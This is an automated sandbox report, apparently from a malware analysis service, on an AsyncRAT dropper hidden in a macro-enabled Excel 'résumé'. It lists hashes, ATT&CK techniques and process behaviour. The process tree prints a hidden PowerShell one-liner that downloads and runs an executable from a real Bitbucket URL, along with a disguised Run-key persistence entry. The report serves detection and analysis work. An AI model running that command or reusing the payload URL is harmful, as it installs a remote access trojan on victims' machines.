asyncrat | cf0f7d178b74a724d306e95469e7e3a8a8974c69a659a365ab8f1c129a69ec10

General

Target

Curriculo Laura Sperandio (ps).xlsm
Size

23KB
MD5

dbad290342a0f6cd2554a4d7b06ff400
SHA1

ea9e6a18734a7a389eaa66eace35c84ede9152c3
SHA256

cf0f7d178b74a724d306e95469e7e3a8a8974c69a659a365ab8f1c129a69ec10
SHA512

a26c41a262c375fce4369b51ee19283504e7aeed975416551f193b00313a083a26a034e69bcff59b6719b006e0dfb0ec4fb295ba6426a12a5d901c5c1810dc63

Score

10^/10

asyncrat persistence rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://bitbucket.org/seveca-emilia/onemoreslave/downloads/sz.exe

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
behavioral2/memory/2992-49-0x000001E6EBCE0000-0x000001E6EBCFE000-memory.dmp	disable_win_def

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2864	756	powershell.exe	EXCEL.EXE

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/2992-49-0x000001E6EBCE0000-0x000001E6EBCFE000-memory.dmp	asyncrat

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

16 2864 powershell.exe
18 2864 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

test.exe

pid process

2212 test.exe
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

flow	pid	process
16	2864	powershell.exe
18	2864	powershell.exe

pid	process
2212	test.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

RegAsm.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefender = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows Defender\\Defender.exe"	RegAsm.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 5 IoCs

Processes:

test.exe

description	pid	process	target process
PID 2212 set thread context of 2192	2212	test.exe	RegAsm.exe
PID 2212 set thread context of 3300	2212	test.exe	RegAsm.exe
PID 2212 set thread context of 2992	2212	test.exe	RegAsm.exe
PID 2212 set thread context of 1076	2212	test.exe	RegAsm.exe
PID 2212 set thread context of 2476	2212	test.exe	RegAsm.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

756 EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 55 IoCs

Processes:

powershell.exetest.exeRegAsm.exe

pid	process
2864	powershell.exe
2864	powershell.exe
2864	powershell.exe
2212	test.exe
2212	test.exe
2212	test.exe
2212	test.exe
2212	test.exe
2212	test.exe
2212	test.exe
2212	test.exe
2212	test.exe
2212	test.exe
2212	test.exe
2212	test.exe
2212	test.exe
2212	test.exe
2212	test.exe
2212	test.exe
2212	test.exe
2212	test.exe
2212	test.exe
2212	test.exe
2212	test.exe
2212	test.exe
2212	test.exe
2212	test.exe
2212	test.exe
2212	test.exe
2212	test.exe
2212	test.exe
2992	RegAsm.exe
2992	RegAsm.exe
2992	RegAsm.exe
2992	RegAsm.exe
2992	RegAsm.exe
2992	RegAsm.exe
2992	RegAsm.exe
2992	RegAsm.exe
2992	RegAsm.exe
2992	RegAsm.exe
2992	RegAsm.exe
2992	RegAsm.exe
2992	RegAsm.exe
2992	RegAsm.exe
2992	RegAsm.exe
2992	RegAsm.exe
2992	RegAsm.exe
2992	RegAsm.exe
2992	RegAsm.exe
2992	RegAsm.exe
2992	RegAsm.exe
2992	RegAsm.exe
2992	RegAsm.exe
2992	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exetest.exeRegAsm.exeRegAsm.exe

description	pid	process
Token: SeDebugPrivilege	2864	powershell.exe
Token: SeDebugPrivilege	2212	test.exe
Token: SeDebugPrivilege	2192	RegAsm.exe
Token: SeDebugPrivilege	2992	RegAsm.exe
Token: SeDebugPrivilege	2992	RegAsm.exe

Suspicious use of SetWindowsHookEx 14 IoCs

Processes:

EXCEL.EXE

pid	process
756	EXCEL.EXE
756	EXCEL.EXE
756	EXCEL.EXE
756	EXCEL.EXE
756	EXCEL.EXE
756	EXCEL.EXE
756	EXCEL.EXE
756	EXCEL.EXE
756	EXCEL.EXE
756	EXCEL.EXE
756	EXCEL.EXE
756	EXCEL.EXE
756	EXCEL.EXE
756	EXCEL.EXE

Suspicious use of WriteProcessMemory 38 IoCs

Processes:

EXCEL.EXEpowershell.exetest.exevbc.exe

description	pid	process	target process
PID 756 wrote to memory of 2864	756	EXCEL.EXE	powershell.exe
PID 756 wrote to memory of 2864	756	EXCEL.EXE	powershell.exe
PID 2864 wrote to memory of 2212	2864	powershell.exe	test.exe
PID 2864 wrote to memory of 2212	2864	powershell.exe	test.exe
PID 2212 wrote to memory of 3076	2212	test.exe	vbc.exe
PID 2212 wrote to memory of 3076	2212	test.exe	vbc.exe
PID 3076 wrote to memory of 2304	3076	vbc.exe	cvtres.exe
PID 3076 wrote to memory of 2304	3076	vbc.exe	cvtres.exe
PID 2212 wrote to memory of 2192	2212	test.exe	RegAsm.exe
PID 2212 wrote to memory of 2192	2212	test.exe	RegAsm.exe
PID 2212 wrote to memory of 2192	2212	test.exe	RegAsm.exe
PID 2212 wrote to memory of 2192	2212	test.exe	RegAsm.exe
PID 2212 wrote to memory of 2192	2212	test.exe	RegAsm.exe
PID 2212 wrote to memory of 2192	2212	test.exe	RegAsm.exe
PID 2212 wrote to memory of 3300	2212	test.exe	RegAsm.exe
PID 2212 wrote to memory of 3300	2212	test.exe	RegAsm.exe
PID 2212 wrote to memory of 3300	2212	test.exe	RegAsm.exe
PID 2212 wrote to memory of 3300	2212	test.exe	RegAsm.exe
PID 2212 wrote to memory of 3300	2212	test.exe	RegAsm.exe
PID 2212 wrote to memory of 3300	2212	test.exe	RegAsm.exe
PID 2212 wrote to memory of 2992	2212	test.exe	RegAsm.exe
PID 2212 wrote to memory of 2992	2212	test.exe	RegAsm.exe
PID 2212 wrote to memory of 2992	2212	test.exe	RegAsm.exe
PID 2212 wrote to memory of 2992	2212	test.exe	RegAsm.exe
PID 2212 wrote to memory of 2992	2212	test.exe	RegAsm.exe
PID 2212 wrote to memory of 2992	2212	test.exe	RegAsm.exe
PID 2212 wrote to memory of 1076	2212	test.exe	RegAsm.exe
PID 2212 wrote to memory of 1076	2212	test.exe	RegAsm.exe
PID 2212 wrote to memory of 1076	2212	test.exe	RegAsm.exe
PID 2212 wrote to memory of 1076	2212	test.exe	RegAsm.exe
PID 2212 wrote to memory of 1076	2212	test.exe	RegAsm.exe
PID 2212 wrote to memory of 1076	2212	test.exe	RegAsm.exe
PID 2212 wrote to memory of 2476	2212	test.exe	RegAsm.exe
PID 2212 wrote to memory of 2476	2212	test.exe	RegAsm.exe
PID 2212 wrote to memory of 2476	2212	test.exe	RegAsm.exe
PID 2212 wrote to memory of 2476	2212	test.exe	RegAsm.exe
PID 2212 wrote to memory of 2476	2212	test.exe	RegAsm.exe
PID 2212 wrote to memory of 2476	2212	test.exe	RegAsm.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Curriculo Laura Sperandio (ps).xlsm"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:756

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe /W hidden /C $TempDir = [System.IO.Path]::GetTempPath();cd $TempDir;(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/seveca-emilia/onemoreslave/downloads/sz.exe',$TempDir+'test.exe');Start-Process 'test.exe'
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2864

C:\Users\Admin\AppData\Local\Temp\test.exe
"C:\Users\Admin\AppData\Local\Temp\test.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2212

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\32n2ltst\32n2ltst.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:3076

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8137.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc8F28898168374A3BA7D0AA35BFC4DD.TMP"
5⤵
PID:2304

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2192

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
4⤵
PID:3300

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2992

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
4⤵
PID:1076

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
4⤵
- Adds Run key to start application
PID:2476

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:2576

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

1

T1064

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Scripting

1

T1064

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\32n2ltst\32n2ltst.0.vb
MD5
ab89f3a5d06284b1349a62d887bef332

SHA1
d5dbc0d54ce172bb5623ce729f40d60a8375a863

SHA256
70510167236c37a3769ff8711fb335b184338f0e7e4d1f9a4b424f23168620b1

SHA512
3fbfabd25902036e9d523aff35a1a331104ec5cfaf64eafd978f7dd93ad7a4cb66199fbe3d24e89f80f75d973db9bf716dd10b8ac479a8b9d78c955fa25d2b5d

Download Submit
C:\Users\Admin\AppData\Local\Temp\32n2ltst\32n2ltst.cmdline
MD5
880c4f336b9adc3e745aa6f725f3fbc9

SHA1
ab812956328c1a7959eb4180434e72b438089083

SHA256
c16895140c4ead7f387fe6792aa53061b8dc2e7bfc3a7f30a094bf6c5d0b8ec6

SHA512
9599449f526def8da23b1d3190c4f49ec72459ed4d17002b0cc6ff0673e181343878de38ba2166d4c35115cfc48073c49aefa848cba3b26565d085e520d21d56

Download Submit
C:\Users\Admin\AppData\Local\Temp\32n2ltst\32n2ltst.dll
MD5
9b11855b53d3c3389031b46e1fcac1ac

SHA1
adaad0f40b419e70519e2529404465815e719eb2

SHA256
9851cbcd986bcc93cf9fa2721429d9a18c8bae1d3024882b1935a23f7a299ed8

SHA512
10d143079d0b8de3ef698df42523516ea0d65408f1805e9298b4f95427c975b448559c1c46aa23453623b625de5cec5e93e07efd9112ae4c881b720182ee019c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8137.tmp
MD5
ffb46da38a8f41a70b29cf996cc387c7

SHA1
8903c08c98d31c0550286cb2be0faa7f702fd71c

SHA256
b6b217ab2dbcd70f0b85b1c717bfa716a31e99755273a7b346244056aadd91ed

SHA512
8455a46ef3d6e8ddb4b19794706220bfb53363253ff3673f24eb7daba759222900f3bc7441c9f4d062a672f4767492e4481ca95674e3aa7f1f81eda17f88c99b

Download Submit
C:\Users\Admin\AppData\Local\Temp\test.exe
MD5
a84b3b7ebad4e58b005fb502e2765e04

SHA1
9ac61b73f987b7d815ca8d06a6e064dcd4d6f849

SHA256
c397eb85439a20b9185e001ec8cd286281d27d6be336d32e93558e451e6aeeeb

SHA512
dab4984405ae8092354d4232c71eb454f86111b12116674aed620d00561e3ea6dbd3798bda14fe755a7a2d45896ed32dd763fdff3711b7cf0cb94763107ed135

Download Submit
C:\Users\Admin\AppData\Local\Temp\test.exe
MD5
a84b3b7ebad4e58b005fb502e2765e04

SHA1
9ac61b73f987b7d815ca8d06a6e064dcd4d6f849

SHA256
c397eb85439a20b9185e001ec8cd286281d27d6be336d32e93558e451e6aeeeb

SHA512
dab4984405ae8092354d4232c71eb454f86111b12116674aed620d00561e3ea6dbd3798bda14fe755a7a2d45896ed32dd763fdff3711b7cf0cb94763107ed135

Download Submit
C:\Users\Admin\AppData\Local\Temp\vbc8F28898168374A3BA7D0AA35BFC4DD.TMP
MD5
48800cf0b3488ef1ca36ef87bfe650da

SHA1
420004eabd35513b6c56c7f936d5ac3716830ad0

SHA256
4318c1a04ddf8271710ff5d97ccd562c6d12f0d2c9a9e07dd1fb178f3908c044

SHA512
e5b3de2c330eeea11ca4513459b90d127d4b3f857b1215c5d18bf10e143f6899a41f320aa93db476698da4959ec81e95d7d803994db97897faa580e751ac5c09

Download Submit
memory/756-2-0x00007FFFD2320000-0x00007FFFD2957000-memory.dmp

Filesize
6.2MB

Download
memory/1076-39-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1076-40-0x0000000140000000-mapping.dmp

Download
memory/1076-42-0x00007FFFC6620000-0x00007FFFC700C000-memory.dmp

Filesize
9.9MB

Download
memory/2192-23-0x0000000140000000-0x000000014000A000-memory.dmp

Filesize
40KB

Download
memory/2192-24-0x0000000140000000-mapping.dmp

Download
memory/2192-26-0x00007FFFC6620000-0x00007FFFC700C000-memory.dmp

Filesize
9.9MB

Download
memory/2212-21-0x000001AC551C0000-0x000001AC55215000-memory.dmp

Filesize
340KB

Download
memory/2212-20-0x000001AC357E0000-0x000001AC357E2000-memory.dmp

Filesize
8KB

Download
memory/2212-11-0x000001AC349A0000-0x000001AC349A1000-memory.dmp

Filesize
4KB

Download
memory/2212-22-0x000001AC4FAB0000-0x000001AC4FAB2000-memory.dmp

Filesize
8KB

Download
memory/2212-10-0x00007FFFC6620000-0x00007FFFC700C000-memory.dmp

Filesize
9.9MB

Download
memory/2212-7-0x0000000000000000-mapping.dmp

Download
memory/2304-16-0x0000000000000000-mapping.dmp

Download
memory/2476-47-0x00007FFFC6620000-0x00007FFFC700C000-memory.dmp

Filesize
9.9MB

Download
memory/2476-45-0x0000000140000000-mapping.dmp

Download
memory/2476-43-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2864-3-0x0000000000000000-mapping.dmp

Download
memory/2864-5-0x00000219F7170000-0x00000219F7171000-memory.dmp

Filesize
4KB

Download
memory/2864-4-0x00007FFFC6620000-0x00007FFFC700C000-memory.dmp

Filesize
9.9MB

Download
memory/2864-6-0x00000219F76E0000-0x00000219F76E1000-memory.dmp

Filesize
4KB

Download
memory/2992-34-0x0000000140000000-mapping.dmp

Download
memory/2992-33-0x0000000140000000-0x0000000140026000-memory.dmp

Filesize
152KB

Download
memory/2992-36-0x00007FFFC6620000-0x00007FFFC700C000-memory.dmp

Filesize
9.9MB

Download
memory/2992-49-0x000001E6EBCE0000-0x000001E6EBCFE000-memory.dmp

Filesize
120KB

Download
memory/3076-13-0x0000000000000000-mapping.dmp

Download
memory/3300-30-0x00007FFFC6620000-0x00007FFFC700C000-memory.dmp

Filesize
9.9MB

Download
memory/3300-28-0x0000000140000000-mapping.dmp

Download
memory/3300-27-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads